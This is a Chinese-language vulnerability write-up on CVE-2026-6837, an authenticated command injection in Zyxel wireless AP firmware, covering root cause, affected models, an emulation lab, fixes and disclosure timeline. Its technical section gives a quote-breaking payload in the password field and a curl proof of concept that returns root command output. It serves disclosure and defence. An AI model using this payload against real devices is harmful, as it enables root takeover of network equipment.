导语:Zyxel 多款无线 AP 设备再曝高危漏洞。安全研究人员发现 export-cgi 程序在处理 PKCS#12 证书导出时存在命令注入,已认证管理员可通过构造特制口令在设备上以 root 权限执行任意 OS 命令,CVSS 3.1 评分 7.2,共影响 18 款 AP 型号。
一、漏洞概述
漏洞标识
- CVE 编号:CVE-2026-6837
- CVSS 3.1 评分:7.2(高危)
- CVSS 3.1 向量:AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
- CWE:CWE-78(OS 命令注入)
漏洞描述
Zyxel 某些 AP 固件版本中的 export-cgi CGI 程序存在一处认证后命令注入漏洞。该漏洞源于证书导出功能中,设备使用用户提供的证书名称和导出口令构建 shell 命令并直接传递给 system() 执行。攻击者可通过在口令字段中插入双引号提前关闭预期字符串,其余输入内容作为 shell 语法被解析执行。
影响范围
| 参数 | 值 |
|---|---|
| 受影响产品 | Zyxel 无线 AP(共 18 款型号) |
| 漏洞组件 | /cgi-bin/export-cgi |
| 漏洞路径 | PKCS#12 证书导出 |
| 利用前提 | 需要管理员会话权限 |
| 影响固件版本 | 7.12(ABRM.0)C0 之前的版本 |
受影响型号:
NWA50AX、NWA50AX PRO、NWA55AXE、NWA55AX PRO、NWA55AX PTP、NWA90AX、NWA90AX PRO、NWA110AX、NWA210AX、NWA220AX-6E、WAX300H、WAX510D、WAX610D、WAX620D-6E、WAX630S、WAX640S-6E、WAX650S、WAX655E
二、技术分析
漏洞根因
漏洞代码使用用户可控的证书名称(arg0)和导出口令(arg1)构造 shell 命令模板:
/bin/zysh -p 200 -e "configure terminal ca _export category local name %s password %s"
该命令直接传递给 system() 执行:
400dd0: bl snprintf(cmd_buf, 4096, format_string, arg0, arg1)
400dd8: bl unlink(tmp_path)
400de0: bl system(cmd_buf)
攻击原理
构造如下 Payload:
arg1 = x"; id; echo COMMAND_INJECTION_CONFIRMED; #
实际执行的命令被变形为:
/bin/zysh -p 200 -e "configure terminal ca _export ... password x"; id; echo COMMAND_INJECTION_CONFIRMED; #"
双引号被提前关闭后,后续内容作为独立 shell 命令执行,导致命令注入。
最小复现 PoC
curl -sk
-H 'Cookie: authtok='
'https://[target]/cgi-bin/export-cgi?category=pkcs12&arg0=&arg1=x%22;id;echo%20COMMAND_INJECTION_CONFIRMED;#'
响应体(带内回显):
uid=0 gid=0(root) groups=0(root)
COMMAND_INJECTION_CONFIRMED
Status: 500 Internal Server Error !
命令输出在 HTTP 响应中直接返回。
限制条件
- 目标设备需已存在可导出的证书对象(本地管理的证书存储中有证书条目)。
- 这不是完全未配置设备的默认开启路径,而是证书管理正常工作流程中的一个分支。
- 仅使用分号的 Payload 无法触发,必须使用引号截断方式。
三、实验环境与工具链
固件信息
| 参数 | 值 |
|---|---|
| 分析产品 | Zyxel WAX650S |
| 固件版本 | V7.10(ABRM.4)C0 |
| 固件 SHA-256 | e0a93db912c0b7203e0eb899f07ddef99b62a82a27352477c0f85d761576b1e0 |
仿真实验环境
该漏洞路径完全通过仿真(rehosting)方式开发,未使用物理硬件。
固件提取
./emulation/extract_710ABRM4C0.sh ./firmware.bin ./710ABRM4C0_extracted
使用 dumpimage、fdtget、ubireader_extract_images 和 unsquashfs 工具,将厂商 FIT 镜像分割、提取 root UBI 卷并解压 SquashFS 根文件系统。
运行环境准备
python3 ./emulation/prepare_zyxel_runroot.py
--src ./710ABRM4C0_extracted/rootfs
--dst ./runroot
将提取的固件规范化为可运行的 runroot,包含 Zyxel 运行时目录、符号链接和启动时占位文件。
启动仿真环境
./emulation/run_zyxel_lab.sh rebuild --phase core
./emulation/run_zyxel_lab.sh health --phase core
使用 qemu-aarch64-static 执行 Zyxel AArch64 用户空间,bwrap 提供 bind-mount 运行时视图。
播种 IPC 对象
python3 ./emulation/seed_zyxel_ipc.py up
python3 ./emulation/uam_unix_server.py
--socket ./runroot/dev/user-request
--log ./live_artifacts/uam-user-request.log
为 Web 栈所需的 SysV IPC 对象和伪造 UAM socket 播种。
触发漏洞路径
./emulation/run_admin_web_handler_focus.sh exportcgi_focus
重放管理员 Web 处理路径,直到在活动 HTTP seam 下触发 vulnerable export-cgi PKCS#12 分支。
使用的主要工具
| 工具 | 用途 |
|---|---|
| qemu-aarch64-static | 直接执行从固件提取的 Zyxel AArch64 用户空间 |
| bubblewrap | 为 /proc、/sys、设备文件和仿真 socket 提供 bind-mount 运行时视图 |
| curl | 驱动特制 HTTP 请求,从活动 CGI 路径捕获带内证明 |
| Python 3 和 Bash | 驱动 runroot 准备、IPC 播种、运行时补丁和重放编排的辅助脚本 |
| dumpimage、fdtget、ubireader_extract_images、unsquashfs | 将厂商镜像解压为可审查的根文件系统 |
四、修复建议
官方修复
Zyxel 已于 2026-08-04 发布安全公告,并发布修复版本 7.12(ABRM.0)C0(针对 WAX650S)。
修复方向
根本修复方案:停止从未受信任的证书导出输入构建 shell 命令。
- 将结构化参数传递到非 shell 执行路径是最干净的解决方案。
- 如确实无法避免使用 shell,则必须强制实施真正的参数分离,而非引号字符串拼接。
升级路径
| 设备型号 | 建议升级版本 |
|---|---|
| WAX650S | 7.12(ABRM.0)C0 或更高 |
| 其他 17 款受影响 AP | 参阅 Zyxel 官方安全公告 |
⚠️ 升级风险提示
- 固件升级可能造成设备短暂离线,建议在维护窗口期操作。
- 升级前建议备份设备配置。
- 升级后需验证各项功能正常运行。
五、时间线
| 日期 | 事件 |
|---|---|
| 2026-04-07 | 问题作为 WAX650S 原始报告的一部分提交给 Zyxel |
| 2026-04-22 | Zyxel PSIRT 确认 CVE-2026-6837 已预留 |
| 2026-08-04 | Zyxel 发布安全公告,列出 18 款受影响 AP 型号 |
六、总结
CVE-2026-6837 是 Zyxel 多款无线 AP 设备中的认证后命令注入漏洞,CVSS 3.1 评分 7.2。攻击者需要获取管理员会话权限,但成功利用后可立即在设备上以 root 身份执行任意 OS 命令,对网络基础设施安全构成严重威胁。建议受影响用户尽快升级到厂商提供的修复版本。
版权声明:本文由华盟网原创发布,保留所有权利。
出处:
- 原文章:https://minanagehsalalma.github.io/CVE-2026-6837-zyxel-export-cgi-command-injection/?1
- Zyxel 官方安全公告:https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-command-injection-and-improper-authentication-vulnerabilities-in-certain-aps-fwa7-and-security-routers-08-04-2026










暂无评论内容